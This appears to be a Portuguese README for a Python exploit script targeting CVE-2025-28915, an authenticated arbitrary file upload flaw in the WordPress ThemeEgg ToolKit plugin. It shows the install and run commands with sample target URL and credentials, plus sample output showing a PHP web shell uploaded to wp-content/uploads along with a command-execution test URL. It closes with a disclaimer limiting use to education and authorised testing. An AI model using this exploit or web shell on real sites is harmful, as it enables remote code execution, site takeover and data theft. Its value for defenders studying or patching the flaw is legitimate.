
Plugin WordPress ThemeEgg ToolKit <= 1.2.9 - Vulnerabilidade de upload arbitrário de arquivos
Uma vulnerabilidade de Upload Irrestrito de Arquivos no plugin ThemeEgg ToolKit para WordPress (versões ≤ 1.2.9) permite que atacantes autenticados carreguem web shells no servidor. Isso pode levar à execução remota de código (RCE), à tomada total do site e ao comprometimento de dados sensíveis.
Este script automatiza a exploração do CVE-2025-28915 ao:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| Argumento | Descrição |
|---|---|
-u | URL do WordPress de destino (ex.: http://target.com/wordpress) |
-un | Nome de usuário do WordPress |
-p | Senha do WordPress |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
Este script é apenas para fins educacionais e de testes de segurança autorizados. O uso não autorizado é ilegal e antiético. O autor não se responsabiliza pelo uso indevido.
Por: Khaled Alenazi (Nxploit)